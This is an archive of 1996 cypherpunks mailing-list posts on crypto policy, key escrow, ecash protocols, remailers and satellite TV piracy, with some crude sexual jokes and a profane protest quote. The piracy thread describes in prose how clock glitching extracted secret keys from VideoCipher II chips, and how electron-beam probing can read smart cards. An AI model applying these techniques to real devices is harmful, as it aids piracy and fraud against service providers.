Oj3u29DrmuTTMk3su51Dc8oQfqF39xS6k1b5EZY/0wqC8fGumItasmwVYZFcILGl
dVO/DyAbuvmud4CamwGtTvmDDL+7Y8mojnLFHyGL7ht1JUasz0oM6EaxJyRIksjx
tSwsRj54D8w=
=MxYS
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@Hrnowl.LoneStar.ORG>
Date: Sun, 31 Mar 1996 20:01:55 +0800
To: unicorn%schloss.li.cypherpunks@toad.com (Black Unicorn) (cypherpunks mailing list)
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <Pine.SUN.3.91.960330141751.22592D-100000@polaris.mindport.net>
Message-ID: <315db2d6.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> (d) [which may be a subset of (b)] impose contempt sanctions on the 
> principal until he releases the key to the key.
> 
> 

Yes, but this will alert the principal not to use that key
for future communications. One of the things that the Leahy
bill  provides for is getting of keys without any of the principals
knowing about it. This idea of escrowing encrypted, essentially
frustrates that provision of the Leahy Bill.

All this talk of voluntary key escrow is essentially fatuous.
If Key escrow is truly voluntary then there is nothing to prevent
the person escrowing from doing all of the following:

1) Not labelling the key escrow file as a key escrow file, so
that the escrow agent does not know that he is an key escrow
agent. The escrow agent can be told that he is a data storage
agent -- which in fact he is.

2) Encrypting the keys before handing to the escrow agent,
and only giving the decryption keys to those who are authorized
to break the escrow.

3) Insuring that the escrow agent and those who are authorized
to break the escrow are outside the jurisdiction of any court.

4) Using the crypto technique of secret splitting to split the secret
of the key among multiple escrow agents in difficult to subpoena
countries.
- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMV2yf/BUQYbUhJh5AQGyXwP5AeQQXJBr8j4vLv2eXTb6HsffHW72Yguu
1h7pILY8Iomo3/vgo1YuoJEfcIwNJaY5T4VEoLghW2H8mJ9gVQoAYkJXb7tvTyee
cBi33OPrNd2SXVYpQ4oF1qnTR+h2mGp9bkf+XQLRRev1jkrdpFYeHsTsP0w6sxLE
X+bqsj+57pE=
=+LHz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Sun, 31 Mar 1996 14:45:00 +0800
To: gnu%toad.com.cypherpunks@toad.com (John Gilmore) (cypherpunks mailing list)
Subject: Re: MUSE (Mail Ubiquitous Security Extensions) discussion starting
In-Reply-To: <9603260842.AA07183@toad.com>
Message-ID: <315db746.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> Don Eastlake has written an internet-draft proposing to add signatures
> and encryption to the Internet mail-delivery system.  The two big
> differences between his proposal and past proposals are:
> 
> 	*  They work at the "sendmail" level, not at the "mail reader"
> 	   level.  This doesn't give your mail complete end-to-end protection
> 	   (unless you use "mail reader" encryption like S/MIME or PGP).
> 	   But it's a lot easier to install and maintain; your sysadmin
> 	   can do it for your whole site, instead of having to retrain
> 	   every user.
> 

One obvious problem with this is that since sendmail runs
at all times of day or night and since sendmail must have
the decryption keys, this means that the decryption keys may
be in the memory of a computer that may be unattended.

This scheme may be useful for its convenience, but many
users will only be willing to turst the computer with their keys
while there messages are actually being decrypted in their
presence.

Thus, many users will want to super encrypt with their own
personal keys.

Thus I believe that the above scheme should be implemented
for mail security between sites, but it should not be viewed
as a total solution.
- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMV229/BUQYbUhJh5AQFrIgP/eejmxUvAiRtJQfkHyrIZflQ6tQBz1PuB
Oxl31K+xnIYmpgIJHb2M+flpeTlOE+6DyIf3ZTB3UMHRqT1v5VrVmDy0ByrukrjF
KRbJTLO2yuDadZKEGKrm+n1FAleCpwuoQJTem7S5XQQts6FCscqaII61HNBkSC0V
JkDwN8ouYsk=
=YUcS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 31 Mar 1996 20:19:04 +0800
To: Mike Ingle <inglem@adnetsol.com>
Subject: Re: [CRYPTO] Cable-TV-Piracy-Punks
In-Reply-To: <199603310256.SAA00348@cryptical.adnetsol.com>
Message-ID: <199603310350.WAA17724@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Ingle writes:
> The big latent assumption here being that you have only one-way
> communication with the subscribers. DSS has a modem.

I am assuming that you mean that DSS has a phone line attached and can
call home. If this is merely a two way satelite communication it isn't
useful for this purpose.

> It could get a new key from a distribution center frequently -
> i.e. every day. Then the pirates would somehow have to update their
> keys daily, in real time.

You mean, perhaps the pirates would have to distribute keys over the
internet or some such? How horrid.

The problem is, as I said, insoluble. You cannot defend against
hostile users of the system because each user gets the same encrypted
data stream. 

> Once we have live packet communication (cable modems or ISDN D-channel,
> for example) the keys can be changed minute by minute, if necessary.

And could be updated to millions of people getting the signal
illegally via the same mechanism.

> The pirates will have to run their own network parallel to the
> legitimate one to distribute the keys. Therefore piracy requires an
> ongoing organization, and is subject to being tracked down.

No one said it wasn't subject to being tracked down, although the use
of offshore packet laundries might make it hard. Cellphone fraud is
subject to being tracked down, too, and yet it happens to the tune of
billions a year.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 31 Mar 1996 20:02:03 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: What happened with Cypherpunks?
In-Reply-To: <199603302339.PAA18937@netcom9.netcom.com>
Message-ID: <199603310351.WAA17732@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> When many of us at Netcom went a week without a feed, I tried to find out
> what was going on.  The best explanation I could get was:\
> 
> >From: David Lesher <wb8foz@nrk.com>
> >
> >The problem is toad.com is broken.
> >It refuses to pass mail to an MX address,

Huh? I get my cypherpunks mail via an MX. Besides, the thing is
running sendmail, which uses MX records.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Sun, 31 Mar 1996 21:04:53 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: Blue Water spooks
In-Reply-To: <Pine.SV4.3.91.960330095337.7063E-100000@larry.infi.net>
Message-ID: <Pine.3.89.9603302337.A27535-0100000@netcom15>
MIME-Version: 1.0
Content-Type: text/plain


	Alan:

On Sat, 30 Mar 1996, Alan Horowitz wrote:

> Is there any indication that the GRU or Chinese or Iranian intelligence 
> (I think these are our only foes nowadays who have blue-water {to mix a

	What about the Allies, and alleged allies of the US.
	Canada, Britian, Israel?   << Why assume that only
	non-allies will want to conduct any sort of sigint
	against human speakers of Navajo.
 
> metaphor} spook services) could do better than the Japanese did in 
> sigint'ing against human speakers of Navajoe?

	Have the Chinese turned their thought towards cryptography,
	or cryptanalysis yet?   If so, I suspect the answer is 
	yes,  If not, then the answer is a definate No.

	The Chinese Intelligence Service traditionally has 
	not looked outward, preferring to ply its trade domestically.
	That said, the earliest extant text on espionage is Chinese. 


> Is the Navjo language still extent among draft-age men?  Life in the 
> Southwest has changed considerably since 1943.

	I suspect more anglos can speak Navajo now, than during WW2 -- both
	numerically, and as a percentage of the population. 
	<< Some americans do think a second languages is useful, unlike
	some people on this list.   Admittedly, the US still has
	a far way to catchup to the European idea of what a 
	literate person is.  >> 


        xan

        jonathon
        grafolog@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 31 Mar 1996 22:32:33 +0800
To: perry@piermont.com
Subject: Re: What happened with Cypherpunks?
Message-ID: <199603310718.XAA27085@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Bill Frantz writes:
>> When many of us at Netcom went a week without a feed, I tried to find out
>> what was going on.  The best explanation I could get was:\
>> 
>> >From: David Lesher <wb8foz@nrk.com>
>> >
>> >The problem is toad.com is broken.
>> >It refuses to pass mail to an MX address,
>
>Huh? I get my cypherpunks mail via an MX. Besides, the thing is
>running sendmail, which uses MX records.
>
>.pm

What I posted is what I received.  They were the ONLY explanation(s) I
received of a cause for the problem.  My understanding of RFC822 and
descendants is not good enough to offer a critique, but I do know that my,
and a number of my friends toad.com feed was constipated for a week until
the Exlax came thru.  If you have a better explanation of what happened, I
would be delighted to receive it.  (BTW - I have notes from a number of
non-Netcom subscribers who report no problems during the effected time.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 31 Mar 1996 20:40:52 +0800
To: cypherpunks@toad.com
Subject: RE: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <FRimLD40w165w@bwalk.dm.com>
Message-ID: <Pine.SOL.3.91.960330232103.10284A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, Dr. Dimitri Vulis wrote:

[...]
> It's interesting to note that while Tim speaks Spanish to gardeners,
> James speaks Spanish to whores. Can't blame him, considering what
[...]
> Why do you suppose people study Latin or Sanskrit or classical Greek?
[...]

To speak to really expensive whores? 

---
"Moo! I tell you I've seen them. Black milk floats, hundreds of them, 
crusiing the streets in the middle of the night. " - The UNigate tapes
   Remember when having a mind like a sponge was a good thing?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 31 Mar 1996 20:55:02 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <199603310759.XAA09261@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A few more hopefully short comments...

perry@piermont.com ("Perry E. Metzger") writes:

 > Why not? If the card knows its own key, then someone else
 > can probably get the key out by some nasty mechanism.

There is no physical difference between cards.  The key
information is stored in EEPROM, and the links which permit the
EEPROM to be written are burned after programming is complete.
The EEPROM data is then only accessible to intimately associated
circuitry in its vicinity.

Presumedly the state of the EEPROM cannot be deduced by any
external examination of the card, and any attempt to
incrementally abrade the card down to the relevent circuit
elements should completely obliterate the minute charge
differences which represent the data.

At least, that's the theory.  The Europeans trust this technology
well enough to let it represent real money, so presumedly they do
not consider hacking a possibility.

Perhaps our resident VLSI and Alpha Particle expert, Timothy C.
May, could give us a guess as to whether Perry's "Nasty
Mechanism" is more or less likely than Maxwell's "Daemon."


inglem@adnetsol.com (Mike Ingle) writes:

 > The big latent assumption here being that you have only
 > one-way communication with the subscribers. DSS has a modem.
 > It could get a new key from a distribution center frequently
 > - i.e. every day. Then the pirates would somehow have to
 > update their keys daily, in real time. Once we have live
 > packet communication (cable modems or ISDN D-channel, for
 > example) the keys can be changed minute by minute, if
 > necessary.

Assuming Perry is right and a smart card could have its innards
transplanted into a hostile environment, the scheme you describe
would offer no real protection.  The compromised card would
simply do the communication with the Key Distribution Center and
give all the information to the pirates.  A low-bandwidth link,
such as a web page, would be more than sufficient to communicate
the required bits to everyone else on the planet.

The security of a smart card based system has to lie in the "data
cannot be recovered even by destructive reverse engineering"
aspect of it.  If this is not a given, then cards can be exactly
cloned, and one clone can tell others what they need to know to
prevent the duplication from becoming known to the other side of
any transaction.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Kenney" <saken@chardos.connix.com>
Date: Sun, 31 Mar 1996 19:52:18 +0800
To: remailer-operators@c2.org
Subject: REMINDER - amnesia remailer public key
Message-ID: <199603310515.AAA16293@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


This is a reminder that the type1(cypherpunks) remailer at
<amnesia@chardos.connix.com> has a new public key. Please REMOVE the old
key from your keyrings. Since the corresponding secret key was lost due
to a combination of hardware failure and destroyed backup media, any
messages send using the old key will be lost.

Attached is the new key. If you don't trust this message, send mail to
amnesia@chardos.connix.com with the Subject: remailer-keys will get you
the latest public keys for the remailer.


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDy9QoAAAEEANhmnki6wxk3/XSAyFMdIaQdA89oaUQimoQoXHVcIUdqmwtR
MvO1xT3axxVELbYrukbNxqEsJZiFnyitSueWUtTYCNkvcb7ynEJhv+ZDrLnn/sot
GcBxyZ8wpwjo06SKjEP4F7LL0a/wESo87o9UgdCJcxhoPqWBBo2GI7oTXfNFAAUR
tDxBbW5lc2lhIFJlbWFpbGluZyBTZXJ2aWNlIDxhbW5lc2lhK3R5cGUxQGNoYXJk
b3MuY29ubml4LmNvbT6JAJUDBRAxOAbgjYYjuhNd80UBAQNuA/9SSPu302xb+k40
TUyVWdfHJXqmVY45BvITLPHbRVmtsWT3c4o7yAt6XUPbGkgkgG8mV5W1fjyN3PxJ
EkZK1r/9H1Cyvm4caLS+stBH3fB8nAir6qibd+4NOKEJ/o91+G1aeFpdzWid30cb
3/Grn9rb2JX/VWhcpm3qkBEovifCA7Q2QW1uZXNpYSBSZW1haWxpbmcgU2Vydmlj
ZSA8YW1uZXNpYUBjaGFyZG9zLmNvbm5peC5jb20+iQCVAwUQMPXOlI2GI7oTXfNF
AQFzMAQAvQ1X3k+Mtg+5YOYKeZPcANtUcEqYT9yKQ/tRrGCxxx/Ph5Mbk76HaSgM
LBEY0CTYf3gxywLNTVHI60viEKPtjMwUxNPZp8E6DIvzMHiM40OK9TjFTAQZMdmC
kuu4Qohg6Q7Po6H0oN3OklZah+su4dr/fYAfRV1dGieT7QFy4Va0H1JlcGxhY2Vt
ZW50IEtleSBGb3I6IDB4M0NBRERBMDWJAJUDBRAw+UiJjYYjuhNd80UBAeUGA/9p
QnyoCllqIU2b3zAcoscCZizcUPxXpeqaJ2X64dRInXftEnZ54QoIhJyCuIjg74QZ
HDS7ceYlAusoWAnnHs+cF/pfV7GW4G4GDYvWGLzruUHaivKd9Ko4fDDR1GvXBFwT
xELr0hGDkGSqJfJfCyB+0KBdHjURX4AjZS1FcY/wRg==
=iwD2
- -----END PGP PUBLIC KEY BLOCK-----
- -- 

Scott Kenney  >|<  saken@chardos.connix.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMV4TfpQgY7wl3Gh1AQGDOgQA0Ku8KYda8AdM7FmKUm7dXkOYM0wI/ZcT
BPXCnkbEwPhpoiuKNtTRjSUuFS9LyCulEuawH+B1mm2TqMy5W/zEu14YV7+mw1UL
J0VZoMx1hAbxd3ruNX+afa15QsMDEgo6BBx/zCE9VQphCdT8YTni8yUB2KHo2xYJ
TFO1kZUwMmY=
=4R2d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sun, 31 Mar 1996 19:42:45 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603310021.TAA17420@jekyll.piermont.com>
Message-ID: <9603310537.AA20289@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> .pm  writes:

> Why not? If the card knows its own key, then someone else can probably
> get the key out by some nasty mechanism.
> 
> 

	One of the earliest breaks of the Videocipher II  analog satellite
descrambler back in 1986 was based on twidling with the timing and
electrical characteristics of the chip clock on the supposedly
tamperproof TMS 7000 crypto microprocessor until it stared to misexecute
instructions.  By chance, some PROM code that allowed reading the secret
seed keys used by each individual box to decode master keying messages
addressed to it happened to be a few instructions after some other code
normally accessible by issuing commands to the chip. One kept issuing
those commands while corrupting the clock until the chip misexecuted the
branch at the end of the public code and fell into the otherwise
inaccessible code that allowed access to the seed keys. 

	So yes, this has already been done in one real case of
cryptosystem defeat.  For a while, it was the standard method of
obtaining seed keys from VC-II boards.

	Later versions of the ROM code removed that vulnerability.

							Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Mar 1996 22:31:16 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <ad837a5900021004127b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 3/30/96, Simon Spero wrote:
>[Everyone's ignoring the obvious answer: Exabyte's, silly :)]
>

No, "exonbytes," the archival storage medium for the post-CDA world. It
automatically filters out the naughty bits.

Dats what I've got.

(By the way, wags may call them "Exon bites," but this usage is forbidden
by the CDA. As well has having already been used, a la Valdez.)


--Klaus

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 31 Mar 1996 22:54:28 +0800
To: cypherpunks@toad.com
Subject: (Excerpted Fwd) Minnesota Online privacy bill in conference comm
Message-ID: <199603310737.CAA13085@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
Date:          Sat, 30 Mar 1996 11:33:26 -0600
To:            privacy@ftc.gov, net-happenings@vm1.nodak.edu, pubs@educom.edu
From:          shel@mtn.org (Sheldon Mains)
Subject:       Minnesota Online privacy bill in conference committee
Reply-to:      privacy@ftc.gov

Minnesota Online Privacy Bill in Conference Committee is in Conference Committee
3-27-1996

The following online privacy option bill passed the full Minnesota State
House and is now in conference committee with a "study" passed
today by the State Senate.  The various interests, including major
commercial on-line services, woke up to the bill and found Senate members
to amend their version which was similar to the House's on the floor with
a short bill that would instead require study.

It is a pretty incredible story that the House bill (following after this
intro) has gotten so far without major attention.

Sheldon Mains
shel@mtn.org

You can track the legislation via the legislative WWW at:
        http://www.leg.state.mn.us

[..]
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Mar 1996 21:20:47 +0800
To: cypherpunks@toad.com
Subject: Navajo Code-Talkers
Message-ID: <ad8389c002021004b128@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:59 PM 3/30/96, Alan Horowitz wrote:
>Is there any indication that the GRU or Chinese or Iranian intelligence
>(I think these are our only foes nowadays who have blue-water {to mix a
>metaphor} spook services) could do better than the Japanese did in
>sigint'ing against human speakers of Navajoe?

Probably. Not that it matters, as Navajo code-talking was a classic example
of security through obscurity. It served its purpose, but approaches such
as this are effectively just _very weak codes_.

I wouldn't expect this "trick" to work as well the second time around.
(Actually, it's been used throughout history, in the sense of people
speaking in what they think to be obscure variants of languages, or in
slang. There is ample evidence that teen lingo is designed to be less
intelligible to adults.)

>From where I am now sitting I can see the Defense Language Institute in
Monterey, where all sorts of obscure languages are taught. AT&T even
located their translation service here, to take advantage of the various
experts (even Yoruba speakers, Alan B. will be pleased to hear).

I'd venture that NSA also has large staffs of language experts, to
interpret the COMINT stuff vacuumed up.

>Is the Navajo language still extent among draft-age men?  Life in the
>Southwest has changed considerably since 1943.

According to an episode of "The X Files," which dealt with Navajo
code-talkers, the answer is that young Navajo men are losing their fluency
in Navajo, especially of the nuances and double entendres that code-talkers
relied upon. (For those who scoff at using a television show as a source,
writers for shows like this often do more interesting research than, say,
the average encyclopedia article will report.)

Finally, there is no draft in the U.S., of course.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 1 Apr 1996 19:45:23 +0800
To: Chein-hsinLiu <cypherpunks@toad.com
Subject: Re: Question about integrity of Blind Signature
Message-ID: <199604010615.WAA05677@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 3/31/96 +0800, Chein-hsinLiu wrote:
>  Hi!
>I have some question about ecash protocol. In ecash protocol, we represent
>money by a sequence number which is signed by bank. And for privacy, we
>use blind signature. But when we send bank a pesudo sequence number--
>X*PK(r) (X:sequence number we want, r :random number to cheat bank)
>then we can get SK(X*PK(r)) from bank, and get money by SK(X*PK(r))/r=SK(X).
>But if we divide SK(X*PK(r)) with r', we can get another money? It confuses
>me. How does it preserve the integrity of the money, and let people divide
>r on the SK(X*PK(r)) ?

The sequence number is not a sequence number, nor is 
it just any random number.  It is a random number of 
some special form, so that the chance that the "other money" 
will be of this special form is remote.  For example one 
might demand that every second hex digit was the number 7, 
and the other digits were random.  When we divide a valid 
money number by r, we will not get another valid money number.



>  It confuses me very long time. Thanks for any help!
>  Chein-hsin Liu 4/1/96
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rollo@artvark.com (Rollo Silver)
Date: Mon, 1 Apr 1996 01:21:56 +0800
To: cypherpunks@toad.com
Subject: "Random Sequence"
Message-ID: <v02130501ad84403b7015@[198.59.115.165]>
MIME-Version: 1.0
Content-Type: text/plain


The paper "On the Effective Definition of 'Random Sequence'", by Michael
Levin, Marvin Minsky, and Roland Silver can be viewed (and downloaded, and
printed) from my website <http://www.artvark.com/artvark>.

At the end of the main menu you'll see a link to "Random Sequences", which
click.

I hand-translated the paper into HTML, making the formulas into GIFs; what
a crock!

Rollo Silver                | e-mail: rollo@artvark.com                  |
Artvark                     | Home page: http://www.artvark.com/artvark/ |
PO Box 219                  | Voice: 505-586-0197                        |
San Cristobal, NM 87564 USA | Compuserve 71174,1453                      |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 1 Apr 1996 00:05:31 +0800
To: cypherpunks@toad.com
Subject: RE: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <Pine.SOL.3.91.960330232103.10284A-100000@chivalry>
Message-ID: <FLoNLD53w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

> On Sat, 30 Mar 1996, Dr. Dimitri Vulis wrote:
[Quoting James, who wrote the knowledge of a foreign language is primarily
useful for talking to whores]
> [...]
> > It's interesting to note that while Tim speaks Spanish to gardeners,
> > James speaks Spanish to whores. Can't blame him, considering what
> [...]
> > Why do you suppose people study Latin or Sanskrit or classical Greek?
> [...]
>
> To speak to really expensive whores?

Consider the crypto implications: James's whores can compare notes and discuss
right in front of him the size of his reproductive organs and the time it takes
him to ejaculate, and he won't understand what they're talking about. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Wagner <daw@cs.berkeley.edu>
Date: Mon, 1 Apr 1996 03:05:03 +0800
To: cypherpunks@toad.com
Subject: Chaumian ecash without RSA
Message-ID: <199603311610.IAA10786@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've always seen Chaum's anonymous ecash system described in terms of RSA.
RSA has this ungainly patent which probably will be around for quite some
time, yet the Diffie-Hellman patent expires pretty soon.  With that motivation,
here's a Chaumian anonymous ecash protocol based on Diffie-Hellman.

Take a publicly known group G and generator g; breaking Diffie-Hellman and
taking discrete logs in this group should be hard.  For instance, G might
be (Z/pZ)^*, the integers modulo a prime p.

The bank picks a secret value k, and publishes g^k.

To withdraw a coin, Alice picks an x, sets
	y = x | hash(x),                [  | is concatenation  ]
chosen so that y is in G.  Alice chooses a random secret blinding factor b,
sends to the bank
	A->B: y g^b,
and the bank returns
	B->A: (y g^b)^k,
debiting Alice's account.

Note that this is a (blinded) Diffie-Hellman key exchange with public
exponentials g^k and y g^b; the bank returns the exchanged "secret".

Alice unblinds this value, computing
	z = (y g^b)^k (g^k)^{-b}
and now c = (x,z) is a coin in the digital cash system.  Note z = y^k.

We use the traditional online clearing protocol; to deposit the coin, a
shop S sends
	S->B: x, z.
The bank checks to make sure the coin hasn't already been spent, and then
computes
	y = x | MD5(x),
checking whether y^k = z.  If equality holds, and the coin hasn't already
been spent, then the bank credits S's account and adds the coin to the
list of spent coins.

This is just the same old Chaum anonymous ecash protocol, except that I've
replaced the RSA operations by Diffie-Hellman ones.  It's a lesser-known
fact that you can blind a Diffie-Hellman key exchange just as you can blind
a RSA signature.

The security of this protocol depends on the intractibility of breaking
Diffie-Hellman.  In particular, given public exponentials g^k and y = g^m,
for k,m unknown, it must be impossible to compute g^{km} = y^k.  Furthermore,
this protocol depends on the hash function being one-way and possessing no
interactions with Diffie-Hellman or modular exponentiation.

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Apr 1996 00:31:00 +0800
To: cypherpunks@toad.com
Subject: PIR_ate
Message-ID: <199603311312.IAA25762@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-31-96. NYT:

   "Sold Out." By James Boyle, American University law
   professor

      We are in the middle of an information land grab and no
      one seems to have noticed. Congress is now considering
      the Administration's proposal for intellectual property
      on the Internet, aimed at "saving" this thriving medium.
      Using a far-fetched theory of what constitutes
      "copying," the proposal would turn browsing an Internet
      document into a copyright violation. It would
      effectively privatize much of the public domain by
      transforming the current law of fair use. It would make
      on-line service providers strictly liable for their
      customers' copyright violations, thus giving providers
      an incentive to monitor what you do in cyberspace.

      "Poetry can only be made out of other poems, novels out
      of other novels," as the critic Northrop Frye famously
      put it. The same goes for computer programs, which build
      on the contributions of earlier hackers. Every
      intellectual property claim is a chunk taken out of the
      public domain. If we give someone a software patent over
      basic functions, at some point the public domain will be
      so diminished that future creators will be prevented
      from creating because they won't be able to afford the
      raw materials they need. An intellectual property system
      has to insure that the fertile public domain is not
      converted into a fallow landscape of walled private
      plots.

   PIR_ate












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 1 Apr 1996 03:31:28 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <m0u3Q6D-0008xCC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 PM 3/30/96 -0800, Mike Duvos wrote:
>A few more hopefully short comments...

> > Why not? If the card knows its own key, then someone else
> > can probably get the key out by some nasty mechanism.
>
>There is no physical difference between cards.  The key
>information is stored in EEPROM, and the links which permit the
>EEPROM to be written are burned after programming is complete.
>The EEPROM data is then only accessible to intimately associated
>circuitry in its vicinity.
>
>Presumedly the state of the EEPROM cannot be deduced by any
>external examination of the card, and any attempt to
>incrementally abrade the card down to the relevent circuit
>elements should completely obliterate the minute charge
>differences which represent the data.
>
>At least, that's the theory.  The Europeans trust this technology
>well enough to let it represent real money, so presumedly they do
>not consider hacking a possibility.
>
>Perhaps our resident VLSI and Alpha Particle expert, Timothy C.
>May, could give us a guess as to whether Perry's "Nasty
>Mechanism" is more or less likely than Maxwell's "Daemon."

I don't know what Tim May will tell you, but over 10 years ago a technology 
was developed which is something like a scanning electron microscope, 
however with very low beam energies and is designed to be able to scan a 
chip and quantitatively measure the voltage at various/all points on the 
chip.  It can be thwarted by a thick coating on the chip, but most organic 
coatings can be removed with  a "plasma asher," a chamber designed to remove 
photoresist coatings on chips.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 1 Apr 1996 07:02:41 +0800
To: cypherpunks@toad.com
Subject: So where's the Burns bill?
Message-ID: <m0u3RCi-0008xVC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>(1) SENATOR BURNS ANNOUNCES BILL TO LIFT CRYPTO EXPORT CONTROLS
>The battle to roll back the Clinton Administration's encryption policy
>escalated on Thursday when Senator Conrad Burns (R-MT) announced that he
>will introduce a new proposal to repeal restrictions on encryption exports
